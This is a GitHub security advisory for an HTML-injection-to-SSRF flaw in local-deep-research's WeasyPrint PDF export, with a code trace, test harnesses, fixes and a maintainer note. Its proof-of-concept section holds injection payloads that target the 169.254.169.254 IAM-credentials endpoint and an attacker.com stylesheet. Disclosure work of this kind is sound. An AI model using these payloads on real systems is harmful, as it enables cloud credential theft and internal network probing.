GHSA-FJ2M-QVH9-JQ4Q

Vulnerability from github – Published: 2026-05-11 19:40 – Updated: 2026-05-11 19:40
Summary
local-deep-research is Vulnerable to HTML Injection via Unescaped User Input in PDF Export (`pdf_service.py:_markdown_to_html`)
Details

Summary

PDFService._markdown_to_html() constructs an HTML document by interpolating user-controlled values — specifically title (sourced from research.title or research.query) and metadata key-value pairs — directly into an f-string without any HTML escaping. An authenticated attacker can craft a research query containing HTML special characters to inject arbitrary HTML tags into the document processed by WeasyPrint during PDF export. This injection can be chained to trigger a Server-Side Request Forgery (SSRF), bypassing the application's existing SSRF defenses in ssrf_validator.py.


Details

Vulnerable code: src/local_deep_research/web/services/pdf_service.py, lines 171–176

# pdf_service.py:171-176
if title:
    html_parts.append(f"<title>{title}</title>")   # ← title is not escaped

if metadata:
    for key, value in metadata.items():
        html_parts.append(f'<meta name="{key}" content="{value}">')  # ← key/value are not escaped

Data flow trace:

User input: research.query
        │
        ▼
research_routes.py:1321
  pdf_title = research.title or research.query
        │
        ▼
research_routes.py:1325-1326
  export_report_to_memory(report_content, format, title=pdf_title)
        │
        ▼
pdf_service.py:107
  PDFService.markdown_to_pdf(markdown_content, title=pdf_title)
        │
        ▼
pdf_service.py:137
  _markdown_to_html(markdown_content, title, metadata)
        │
        ▼
pdf_service.py:172
  f"<title>{title}</title>"   ← injection point, no escaping
        │
        ▼
pdf_service.py:112
  HTML(string=html_content)   ← WeasyPrint renders the injected HTML

research.query is a string submitted by the user via POST /api/start_research, stored as-is in the database, and retrieved without any sanitization. When the user triggers POST /api/v1/research/<research_id>/export/pdf, this value is embedded unescaped into the HTML document processed by WeasyPrint.

Injection point 1: <title> tag breakout

Input:    </title><img src="http://169.254.169.254/latest/meta-data/" />
Rendered: <title></title><img src="http://169.254.169.254/latest/meta-data/" /></title>

When WeasyPrint encounters the injected <img> tag, its default behavior is to issue an HTTP GET request to the URL in the tag's src attribute.
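The breakout can be reproduced without WeasyPrint. The sketch below is a minimal illustration, not the project's code: `build_head` is a hypothetical stand-in for the unescaped f-string at pdf_service.py:172, and the standard-library `HTMLParser` is used only to list the tags a parser sees in the result.

```python
from html.parser import HTMLParser


def build_head(title: str) -> str:
    """Hypothetical stand-in for the unescaped f-string in _markdown_to_html."""
    return f"<head><title>{title}</title></head>"


class TagCollector(HTMLParser):
    """Records every start tag and its attributes in document order."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[tuple[str, dict]] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


payload = '</title><img src="http://169.254.169.254/latest/meta-data/" />'
rendered = build_head(payload)

collector = TagCollector()
collector.feed(rendered)
collector.close()

found_tags = [name for name, _ in collector.tags]
print(rendered)
print(found_tags)  # the <img> element now exists as a real tag, outside <title>
```

The payload closes the `<title>` element early, so the `<img>` that follows is parsed as markup rather than as title text.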

Injection point 2: <meta> attribute breakout

Input:    " /><link rel="stylesheet" href="http://attacker.com/evil.css
Rendered: <meta name="..." content="" /><link rel="stylesheet" href="http://attacker.com/evil.css">

WeasyPrint will fetch and apply the external stylesheet, which also constitutes SSRF.
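In the attribute context the double quote is the character that matters. The following sketch, again using a hypothetical stand-in (`build_meta`) rather than the project's function, compares a payload that starts with a double quote against one that contains none; the names and the `author` key are illustrative assumptions.

```python
from html.parser import HTMLParser


def build_meta(key: str, value: str) -> str:
    """Hypothetical stand-in for the unescaped <meta> f-string."""
    return f'<meta name="{key}" content="{value}">'


class StartTags(HTMLParser):
    """Collects the names of all start tags the parser recognises."""

    def __init__(self) -> None:
        super().__init__()
        self.seen: list[str] = []

    def handle_starttag(self, tag, attrs):
        self.seen.append(tag)


def tags_in(html_text: str) -> list[str]:
    parser = StartTags()
    parser.feed(html_text)
    parser.close()
    return parser.seen


# Starts with a double quote: terminates content="..." and opens a new tag.
with_quote = '" /><link rel="stylesheet" href="http://attacker.com/evil.css'
# No double quote: the whole string stays inside the content attribute.
without_quote = "><link rel=stylesheet href=http://attacker.com/evil.css>"

tags_with_quote = tags_in(build_meta("author", with_quote))
tags_without_quote = tags_in(build_meta("author", without_quote))
print(tags_with_quote)
print(tags_without_quote)
```

Only the quoted payload produces a `<link>` element, which is why escaping must cover quotes as well as angle brackets.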


Proof of Concept

Step 1: Log in and submit a research query containing the injection payload

POST /api/start_research HTTP/1.1
Host: localhost:5000
Content-Type: application/json
Cookie: session=<valid_session>

{
  "query": "</title><img src=\"http://169.254.169.254/latest/meta-data/iam/security-credentials/\" onerror=\"x\"/>",
  "mode": "quick",
  "model_provider": "OLLAMA",
  "model": "llama3"
}

The response returns a research_id, e.g. "aaaa-bbbb-cccc-dddd".

Step 2: After the research completes, trigger PDF export

POST /api/v1/research/aaaa-bbbb-cccc-dddd/export/pdf HTTP/1.1
Host: localhost:5000
Cookie: session=<valid_session>
X-CSRFToken: <csrf_token>

Step 3: Intermediate HTML constructed server-side

<!DOCTYPE html><html><head>
<meta charset="utf-8">
<title></title><img src="http://169.254.169.254/latest/meta-data/iam/security-credentials/" onerror="x"/></title>
</head><body>
...report content...
</body></html>

Step 4: WeasyPrint issues an outbound HTTP request to the injected URL

Observed in network monitoring (e.g. tcpdump) or the target internal service logs:

GET /latest/meta-data/iam/security-credentials/ HTTP/1.1
Host: 169.254.169.254
User-Agent: WeasyPrint/...
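Where no metadata endpoint or packet capture is available, the outbound request can be observed with a small canary listener instead. This is a minimal sketch under stated assumptions: the listener address must be reachable from the server running the export, the `/canary/pdf-export` path is made up for illustration, and the final `urllib` call merely stands in for the renderer's fetch so the example runs on its own.

```python
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

observed_requests: list[tuple[str, str]] = []


class CanaryHandler(BaseHTTPRequestHandler):
    """Records the path and User-Agent of every GET, then answers 204."""

    def do_GET(self):
        observed_requests.append((self.path, self.headers.get("User-Agent", "")))
        self.send_response(204)
        self.end_headers()

    def log_message(self, format, *args):
        pass  # keep the console quiet


def start_canary() -> tuple[HTTPServer, str]:
    server = HTTPServer(("127.0.0.1", 0), CanaryHandler)  # port 0 picks a free port
    threading.Thread(target=server.serve_forever, daemon=True).start()
    host, port = server.server_address
    return server, f"http://{host}:{port}"


server, base_url = start_canary()
canary_url = f"{base_url}/canary/pdf-export"

# Payload to submit as the research query in Step 1.
payload = f'</title><img src="{canary_url}" />'
print(payload)

# Stand-in for the renderer's request (proxies disabled for the local call).
opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))
opener.open(canary_url).close()

server.shutdown()
server.server_close()
print(observed_requests)
```

In a real test the stand-in request is removed and the listener is left running while the export in Step 2 is triggered; an entry in `observed_requests` then indicates that the renderer fetched the injected URL.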

Lightweight verification (no SSRF environment required):

Set the query to:

</title><title>INJECTED

The resulting HTML will contain two <title> tags and the PDF document metadata title will read INJECTED, confirming successful injection.
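If the intermediate HTML can be captured, the duplicate-title condition can also be checked mechanically. The sketch below assumes a hypothetical stand-in (`build_title`) for the vulnerable f-string and simply counts opening `<title>` tags.

```python
import re


def build_title(title: str) -> str:
    """Hypothetical stand-in for the unescaped <title> f-string."""
    return f"<title>{title}</title>"


def count_title_tags(html_text: str) -> int:
    """Counts opening <title> tags, ignoring case."""
    return len(re.findall(r"<title\b", html_text, flags=re.IGNORECASE))


benign = build_title("solar panel efficiency")
injected = build_title("</title><title>INJECTED")

print(count_title_tags(benign))
print(count_title_tags(injected))
```

A count above one in the generated document indicates that the query text was interpreted as markup.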


Impact

1. Chained SSRF (High Severity)

When an attacker injects <img src>, <link href>, or <style>@import url() tags pointing to internal addresses, WeasyPrint issues HTTP requests from the server during PDF generation. This allows access to:

  • Cloud metadata services (169.254.169.254) on AWS, GCP, or Azure — enabling theft of IAM credentials and instance identity documents.
  • Internal network services (192.168.x.x, 10.x.x.x) — enabling reconnaissance and interaction with internal APIs not exposed to the internet.
  • Localhost administrative interfaces — if SSRF protections are only applied at the user-input validation layer.

This is an effective bypass of the application's existing SSRF defenses in ssrf_validator.py, because WeasyPrint's outbound resource requests are never routed through that validator.

2. HTML Document Structure Corruption

Injected tags can prematurely close <head> and insert arbitrary content into <body>, causing WeasyPrint to render incorrectly or crash, resulting in a Denial of Service (DoS) condition for the export functionality.

3. CSS Injection (Medium Severity)

By injecting <link> or <style> tags that load external stylesheets, an attacker can fully control the visual content of the generated PDF, enabling report content forgery or spoofing.

4. Affected Scope

  • All PDF export operations are affected.
  • The vulnerability is reachable by any authenticated user — no elevated privileges required.
  • Because each user operates against their own encrypted database, cross-user exploitation is not possible. However, on any shared or multi-tenant deployment, every authenticated user can independently trigger this vulnerability.

Remediation

Apply html.escape() to all user-controlled values before embedding them in the HTML template inside _markdown_to_html:

import html

if title:
    html_parts.append(f"<title>{html.escape(title)}</title>")

if metadata:
    for key, value in metadata.items():
        html_parts.append(
            f'<meta name="{html.escape(str(key))}" content="{html.escape(str(value))}">'
        )
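The effect of `html.escape()` on the two payloads from the Details section can be checked directly. This is a small sketch; the `author` key is an illustrative assumption. It also shows why the default `quote=True` matters for the attribute context.

```python
import html

title_payload = '</title><img src="http://169.254.169.254/latest/meta-data/" />'
meta_payload = '" /><link rel="stylesheet" href="http://attacker.com/evil.css'

safe_title = f"<title>{html.escape(title_payload)}</title>"
safe_meta = f'<meta name="author" content="{html.escape(meta_payload)}">'

print(safe_title)
print(safe_meta)

# With quote=False the double quote survives, so the attribute could still be closed.
print(html.escape('"', quote=False))
```

After escaping, the only angle brackets and unescaped quotes left in each string are the ones the template itself wrote.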

Additionally, consider configuring WeasyPrint with a custom url_fetcher that blocks or restricts outbound HTTP requests, to prevent SSRF via injected or legitimately embedded external resources:

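import weasyprint
from weasyprint import HTML
from ssrf_validator import validate_url  # adjust to the project's actual import path

def safe_url_fetcher(url, timeout=10):
    # Reject the URL before WeasyPrint makes any network request for it.
    if not validate_url(url):
        raise ValueError(f"Blocked unsafe URL in PDF rendering: {url}")
    return weasyprint.default_url_fetcher(url, timeout=timeout)

# html_content is the HTML string produced by _markdown_to_html.
html_doc = HTML(string=html_content, url_fetcher=safe_url_fetcher)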
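The guard pattern itself can be exercised without WeasyPrint or network access. The sketch below is an illustration only: `make_guarded_fetcher`, `BlockedResourceError`, `toy_validate`, and `fake_delegate` are hypothetical names, and the toy rule is not a real SSRF policy. It shows that the delegate is never invoked for a rejected URL.

```python
from typing import Callable


class BlockedResourceError(ValueError):
    """Hypothetical error raised for URLs the validator rejects."""


def make_guarded_fetcher(
    validate: Callable[[str], bool],
    delegate: Callable[[str], dict],
) -> Callable[[str], dict]:
    """Wraps `delegate` so it only runs for URLs that `validate` accepts."""

    def guarded(url: str) -> dict:
        if not validate(url):
            raise BlockedResourceError(f"Blocked unsafe URL in PDF rendering: {url}")
        return delegate(url)

    return guarded


fetched: list[str] = []


def fake_delegate(url: str) -> dict:
    """Stand-in for the real fetcher; records the URL instead of fetching it."""
    fetched.append(url)
    return {"url": url}


def toy_validate(url: str) -> bool:
    """Toy rule for the demo only: allow a single example host."""
    return url.startswith("https://cdn.example.com/")


fetcher = make_guarded_fetcher(toy_validate, fake_delegate)
fetcher("https://cdn.example.com/report.css")

try:
    fetcher("http://169.254.169.254/latest/meta-data/")
    blocked = False
except BlockedResourceError:
    blocked = True

print(fetched, blocked)
```

Passing the validator and the delegate in as parameters keeps the policy testable on its own, separately from the rendering library.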

Report generated against commit f3540fb3 — local-deep-research, branch main.


Maintainer note (2026-04-24)

Thanks @Firebasky for the detailed report. The complete remediation spans two PRs, both merged to main:

#3082 (merged 2026-03-29, shipped in v1.5.0+) closes the HTML-injection sinks:

  • html.escape() now wraps the title value in <title>…</title>
  • Same for metadata keys/values in <meta name="…" content="…">
  • Regression tests added in tests/web/services/test_pdf_service.py

#3613 (merged 2026-04-24, shipped in v1.6.0) implements the url_fetcher recommendation from the Remediation section:

  • New _safe_url_fetcher in pdf_service.py delegates to weasyprint.default_url_fetcher only after security.ssrf_validator.validate_url accepts the URL
  • Blocks AWS metadata (169.254.169.254), RFC1918, loopback, and non-http(s) schemes
  • Covers the chained SSRF path through any URL reaching the rendered HTML: markdown body, citations, raw-HTML passthrough via Python-Markdown
  • Blocked URLs raise UnsafePDFResourceURLError (a ValueError subclass) so WeasyPrint skips the resource and the render continues
  • 8 regression tests, including an end-to-end render with <img src="http://169.254.169.254/…"> embedded in the body
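The kinds of checks listed for #3613 can be approximated with the standard library. This is a rough sketch of such a policy, not the project's `validate_url`: the function names, the injectable `resolver` parameter, and the exact set of blocked ranges are assumptions made for illustration.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def resolve_host(hostname: str) -> list[str]:
    """Default resolver: every address the name maps to."""
    return [info[4][0] for info in socket.getaddrinfo(hostname, None)]


def is_internal(address: str) -> bool:
    """True for private (RFC 1918), loopback, link-local, and unspecified addresses."""
    ip = ipaddress.ip_address(address)
    return ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_unspecified


def is_url_allowed(url: str, resolver=resolve_host) -> bool:
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES or not parts.hostname:
        return False
    try:
        addresses = resolver(parts.hostname)
    except OSError:
        return False  # unresolvable names are rejected
    # Reject if ANY resolved address is internal.
    return bool(addresses) and not any(is_internal(a) for a in addresses)


def literal(host: str) -> list[str]:
    """Test resolver for IP-literal hosts: avoids DNS lookups in the demo."""
    return [host]


for candidate in (
    "http://169.254.169.254/latest/meta-data/",
    "http://10.0.0.5/admin",
    "http://127.0.0.1:5000/",
    "file:///etc/passwd",
    "https://8.8.8.8/",
):
    print(candidate, is_url_allowed(candidate, resolver=literal))
```

A check of this shape validates the name at one moment and fetches at another, so a production validator would also need to consider DNS rebinding and redirects; those are outside this sketch.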

Advisory metadata: CVSS vector CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N (5.0 Moderate); CWEs CWE-79 and CWE-918. Patched in v1.6.0: upgrade to v1.6.0 or later to receive both fixes.


{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "local-deep-research"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.6.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-43979"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79",
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-11T19:40:07Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "## Summary\n\n`PDFService._markdown_to_html()` constructs an HTML document by interpolating user-controlled values \u2014 specifically `title` (sourced from `research.title` or `research.query`) and `metadata` key-value pairs \u2014 directly into an f-string without any HTML escaping. An authenticated attacker can craft a research query containing HTML special characters to inject arbitrary HTML tags into the document processed by WeasyPrint during PDF export. This injection can be chained to trigger a Server-Side Request Forgery (SSRF), bypassing the application\u0027s existing SSRF defenses in `ssrf_validator.py`.\n\n---\n\n## Details\n\n**Vulnerable code:** `src/local_deep_research/web/services/pdf_service.py`, lines 171\u2013176\n\n```python\n# pdf_service.py:171-176\nif title:\n    html_parts.append(f\"\u003ctitle\u003e{title}\u003c/title\u003e\")   # \u2190 title is not escaped\n\nif metadata:\n    for key, value in metadata.items():\n        html_parts.append(f\u0027\u003cmeta name=\"{key}\" content=\"{value}\"\u003e\u0027)  # \u2190 key/value are not escaped\n```\n\n**Data flow trace:**\n\n```\nUser input: research.query\n        \u2502\n        \u25bc\nresearch_routes.py:1321\n  pdf_title = research.title or research.query\n        \u2502\n        \u25bc\nresearch_routes.py:1325-1326\n  export_report_to_memory(report_content, format, title=pdf_title)\n        \u2502\n        \u25bc\npdf_service.py:107\n  PDFService.markdown_to_pdf(markdown_content, title=pdf_title)\n        \u2502\n        \u25bc\npdf_service.py:137\n  _markdown_to_html(markdown_content, title, metadata)\n        \u2502\n        \u25bc\npdf_service.py:172\n  f\"\u003ctitle\u003e{title}\u003c/title\u003e\"   \u2190 injection point, no escaping\n        \u2502\n        \u25bc\npdf_service.py:112\n  HTML(string=html_content)   \u2190 WeasyPrint renders the injected HTML\n```\n\n`research.query` is a string submitted by the user via `POST /api/start_research`, stored as-is in the 
database, and retrieved without any sanitization. When the user triggers `POST /api/v1/research/\u003cresearch_id\u003e/export/pdf`, this value is embedded unescaped into the HTML document processed by WeasyPrint.\n\n**Injection point 1: `\u003ctitle\u003e` tag breakout**\n\n```\nInput:    \u003c/title\u003e\u003cimg src=\"http://169.254.169.254/latest/meta-data/\" /\u003e\nRendered: \u003ctitle\u003e\u003c/title\u003e\u003cimg src=\"http://169.254.169.254/latest/meta-data/\" /\u003e\u003c/title\u003e\n```\n\nWhen WeasyPrint encounters the injected `\u003cimg\u003e` tag, it issues an HTTP GET request to the value of `src` by default.\n\n**Injection point 2: `\u003cmeta\u003e` attribute breakout**\n\n```\nInput:    \" /\u003e\u003clink rel=\"stylesheet\" href=\"http://attacker.com/evil.css\nRendered: \u003cmeta name=\"...\" content=\"\" /\u003e\u003clink rel=\"stylesheet\" href=\"http://attacker.com/evil.css\"\u003e\n```\n\nWeasyPrint will fetch and apply the external stylesheet, which also constitutes SSRF.\n\n---\n\n## Proof of Concept\n\n**Step 1: Log in and submit a research query containing the injection payload**\n\n```http\nPOST /api/start_research HTTP/1.1\nHost: localhost:5000\nContent-Type: application/json\nCookie: session=\u003cvalid_session\u003e\n\n{\n  \"query\": \"\u003c/title\u003e\u003cimg src=\\\"http://169.254.169.254/latest/meta-data/iam/security-credentials/\\\" onerror=\\\"x\\\"/\u003e\",\n  \"mode\": \"quick\",\n  \"model_provider\": \"OLLAMA\",\n  \"model\": \"llama3\"\n}\n```\n\nThe response returns a `research_id`, e.g. 
`\"aaaa-bbbb-cccc-dddd\"`.\n\n**Step 2: After the research completes, trigger PDF export**\n\n```http\nPOST /api/v1/research/aaaa-bbbb-cccc-dddd/export/pdf HTTP/1.1\nHost: localhost:5000\nCookie: session=\u003cvalid_session\u003e\nX-CSRFToken: \u003ccsrf_token\u003e\n```\n\n**Step 3: Intermediate HTML constructed server-side**\n\n```html\n\u003c!DOCTYPE html\u003e\u003chtml\u003e\u003chead\u003e\n\u003cmeta charset=\"utf-8\"\u003e\n\u003ctitle\u003e\u003c/title\u003e\u003cimg src=\"http://169.254.169.254/latest/meta-data/iam/security-credentials/\" onerror=\"x\"/\u003e\u003c/title\u003e\n\u003c/head\u003e\u003cbody\u003e\n...report content...\n\u003c/body\u003e\u003c/html\u003e\n```\n\n**Step 4: WeasyPrint issues an outbound HTTP request to the injected URL**\n\nObserved in network monitoring (e.g. `tcpdump`) or the target internal service logs:\n\n```\nGET /latest/meta-data/iam/security-credentials/ HTTP/1.1\nHost: 169.254.169.254\nUser-Agent: WeasyPrint/...\n```\n\n**Lightweight verification (no SSRF environment required):**\n\nSet the query to:\n\n```\n\u003c/title\u003e\u003ctitle\u003eINJECTED\n```\n\nThe resulting HTML will contain two `\u003ctitle\u003e` tags and the PDF document metadata title will read `INJECTED`, confirming successful injection.\n\n---\n\n## Impact\n\n### 1. Chained SSRF (High Severity)\n\nBy injecting `\u003cimg src\u003e`, `\u003clink href\u003e`, or `\u003cstyle\u003e@import url()` tags pointing to internal addresses, WeasyPrint will issue HTTP requests on behalf of the server during PDF generation. 
This allows access to:\n\n- **Cloud metadata services** (`169.254.169.254`) on AWS, GCP, or Azure \u2014 enabling theft of IAM credentials and instance identity documents.\n- **Internal network services** (`192.168.x.x`, `10.x.x.x`) \u2014 enabling reconnaissance and interaction with internal APIs not exposed to the internet.\n- **Localhost administrative interfaces** \u2014 if SSRF protections are only applied at the user-input validation layer.\n\nThis is an effective bypass of the application\u0027s existing SSRF defenses in `ssrf_validator.py`, because WeasyPrint\u0027s outbound resource requests are never routed through that validator.\n\n### 2. HTML Document Structure Corruption\n\nInjected tags can prematurely close `\u003chead\u003e` and insert arbitrary content into `\u003cbody\u003e`, causing WeasyPrint to render incorrectly or crash, resulting in a Denial of Service (DoS) condition for the export functionality.\n\n### 3. CSS Injection (Medium Severity)\n\nBy injecting `\u003clink\u003e` or `\u003cstyle\u003e` tags that load external stylesheets, an attacker can fully control the visual content of the generated PDF, enabling report content forgery or spoofing.\n\n### 4. Affected Scope\n\n- All PDF export operations are affected.\n- The vulnerability is reachable by any authenticated user \u2014 no elevated privileges required.\n- Because each user operates against their own encrypted database, cross-user exploitation is not possible. 
However, on any shared or multi-tenant deployment, every authenticated user can independently trigger this vulnerability.\n---\n\n## Remediation\n\nApply `html.escape()` to all user-controlled values before embedding them in the HTML template inside `_markdown_to_html`:\n\n```python\nimport html\n\nif title:\n    html_parts.append(f\"\u003ctitle\u003e{html.escape(title)}\u003c/title\u003e\")\n\nif metadata:\n    for key, value in metadata.items():\n        html_parts.append(\n            f\u0027\u003cmeta name=\"{html.escape(str(key))}\" content=\"{html.escape(str(value))}\"\u003e\u0027\n        )\n```\n\nAdditionally, consider configuring WeasyPrint with a custom `url_fetcher` that blocks or restricts outbound HTTP requests to prevent SSRF via injected or legitimately-embedded external resources:\n\n```python\ndef safe_url_fetcher(url, timeout=10):\n    from ssrf_validator import validate_url\n    if not validate_url(url):\n        raise ValueError(f\"Blocked unsafe URL in PDF rendering: {url}\")\n    return weasyprint.default_url_fetcher(url, timeout=timeout)\n\nhtml_doc = HTML(string=html_content, url_fetcher=safe_url_fetcher)\n```\n---\n\n*Report generated against commit `f3540fb3` \u2014 local-deep-research, branch `main`.*\n\n\n---\n\n## Maintainer note (2026-04-24)\n\nThanks @Firebasky for the detailed report. 
The complete remediation spans two PRs, both merged to `main`:\n\n**#3082** (merged 2026-03-29, shipped in **v1.5.0+**) \u2014 closes the HTML-injection sinks:\n- `html.escape()` now wraps the `title` value in `\u003ctitle\u003e\u2026\u003c/title\u003e`\n- Same for metadata keys/values in `\u003cmeta name=\"\u2026\" content=\"\u2026\"\u003e`\n- Regression tests added in `tests/web/services/test_pdf_service.py`\n\n**#3613** (merged 2026-04-24, shipped in **v1.6.0**) \u2014 implements the `url_fetcher` recommendation from the Remediation section:\n- New `_safe_url_fetcher` in `pdf_service.py` delegates to `weasyprint.default_url_fetcher` only after `security.ssrf_validator.validate_url` accepts the URL\n- Blocks AWS metadata (169.254.169.254), RFC1918, loopback, and non-http(s) schemes\n- Covers the chained SSRF path through any URL reaching the rendered HTML \u2014 markdown body, citations, raw-HTML passthrough via Python-Markdown\n- Blocked URLs raise `UnsafePDFResourceURLError` (a `ValueError` subclass) so WeasyPrint skips the resource and the render continues\n- 8 regression tests, including an end-to-end render with `\u003cimg src=\"http://169.254.169.254/\u2026\"\u003e` embedded in the body\n\n**Advisory metadata:** CVSS `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N` (5.0 Moderate), CWEs **CWE-79** + **CWE-918**. **Patched in v1.6.0** \u2014 upgrade to v1.6.0 or later to receive both fixes.",
  "id": "GHSA-fj2m-qvh9-jq4q",
  "modified": "2026-05-11T19:40:07Z",
  "published": "2026-05-11T19:40:07Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/LearningCircuit/local-deep-research/security/advisories/GHSA-fj2m-qvh9-jq4q"
    },
    {
      "type": "WEB",
      "url": "https://github.com/LearningCircuit/local-deep-research/pull/3082"
    },
    {
      "type": "WEB",
      "url": "https://github.com/LearningCircuit/local-deep-research/pull/3613"
    },
    {
      "type": "WEB",
      "url": "https://github.com/LearningCircuit/local-deep-research/commit/0148fa265a3da460c07def7441f9ac49ea61fbcb"
    },
    {
      "type": "WEB",
      "url": "https://github.com/LearningCircuit/local-deep-research/commit/15f13d5c79847f1c38c2dc67bd0027c38af9e34b"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/LearningCircuit/local-deep-research"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "local-deep-research is Vulnerable to HTML Injection via Unescaped User Input in PDF Export (`pdf_service.py:_markdown_to_html`)"
}

